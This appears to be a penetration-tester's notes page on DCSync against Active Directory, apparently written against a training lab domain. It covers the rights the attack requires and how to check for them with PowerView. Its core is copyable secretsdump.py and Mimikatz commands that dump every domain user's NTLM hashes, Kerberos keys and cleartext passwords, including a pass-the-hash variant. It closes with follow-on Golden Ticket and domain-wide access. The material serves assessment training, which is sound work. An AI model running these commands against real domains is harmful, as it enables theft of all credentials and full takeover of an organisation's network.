Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

DCSync

DCSync abuses the Directory Replication Service Remote Protocol to mimic a Domain Controller and retrieve NTLM password hashes for all domain users. This is typically the final step in a domain compromise chain.

How DCSync Works

Domain Controllers replicate AD data between each other using the DS-Replication-Get-Changes-All extended right. DCSync requests a DC to replicate password data as if the attacker were another DC.

Required Permissions

The attacking account needs both of these extended rights on the domain object (DC=domain,DC=local):

  • Replicating Directory Changes (DS-Replication-Get-Changes)
  • Replicating Directory Changes All (DS-Replication-Get-Changes-All)

Accounts with these rights by default: Domain Admins, Enterprise Admins, default domain Administrator.

It is common to find non-admin accounts with these rights during assessments. If you have WriteDACL over the domain object, you can grant yourself these rights, perform DCSync, then remove them.

Verifying DCSync Rights

PowerView

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl

Look for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All both set to AccessAllowed for the target SID.

PowerView — Check user context

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl

BloodHound

Use the pre-built query “Find Principals with DCSync Rights”.

Performing DCSync from Linux

secretsdump.py (Impacket)

# Dump all hashes + Kerberos keys + cleartext passwords
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

# NTLM hashes only
secretsdump.py -outputfile hashes -just-dc-ntlm INLANEFREIGHT/adunn@172.16.5.5

# Single user only
secretsdump.py -just-dc-user administrator INLANEFREIGHT/adunn@172.16.5.5

# With NTLM hash authentication (pass-the-hash)
secretsdump.py -just-dc-ntlm -hashes :NTLM_HASH INLANEFREIGHT/adunn@172.16.5.5

Useful secretsdump.py Flags

FlagPurpose
-just-dcExtract NTLM hashes, Kerberos keys, and cleartext passwords from NTDS
-just-dc-ntlmNTLM hashes only
-just-dc-user <USER>Extract data for a single user
-pwd-last-setShow when each password was last changed
-historyDump password history (useful for cracking metrics)
-user-statusShow if accounts are disabled (filter for accurate reporting)
-outputfile <PREFIX>Write output to files with given prefix

Output Files

The -just-dc flag produces three files:

FileContents
<prefix>.ntdsNTLM hashes (domain\user:rid:lmhash:nthash)
<prefix>.ntds.kerberosKerberos keys (DES, AES)
<prefix>.ntds.cleartextCleartext passwords for accounts with reversible encryption

Performing DCSync from Windows

Mimikatz

Mimikatz must run in the context of a user with DCSync rights. Use runas.exe if needed:

runas /netonly /user:INLANEFREIGHT\adunn powershell

From the spawned session:

mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

This returns the NTLM hash and supplemental credentials for the specified user.

To dump all accounts:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /all /csv

Reversible Encryption

Accounts with “Store password using reversible encryption” enabled store passwords encrypted with RC4 using the Syskey (extractable by Domain Admins). secretsdump.py automatically decrypts these.

Enumerate accounts with reversible encryption

# With Get-ADUser
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

# With PowerView
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol

This is rare but does occur. Some organizations enable it for periodic password audits. Passwords remain reversibly encrypted until the user changes their password after the setting is disabled.

Post-DCSync

With the domain Administrator NTLM hash or the krbtgt hash, you can:

  • Pass-the-Hash to any domain-joined system as Administrator
  • Create a Golden Ticket using the krbtgt hash for persistent domain access
  • Crack hashes offline for password strength metrics and reporting
  • Access any resource in the domain

Reporting Considerations

When providing password cracking statistics to clients, use the -user-status flag with secretsdump.py to filter out disabled accounts. Metrics should reflect only active accounts:

  • Number and percentage of passwords cracked
  • Top 10 most common passwords
  • Password length distribution
  • Password reuse across accounts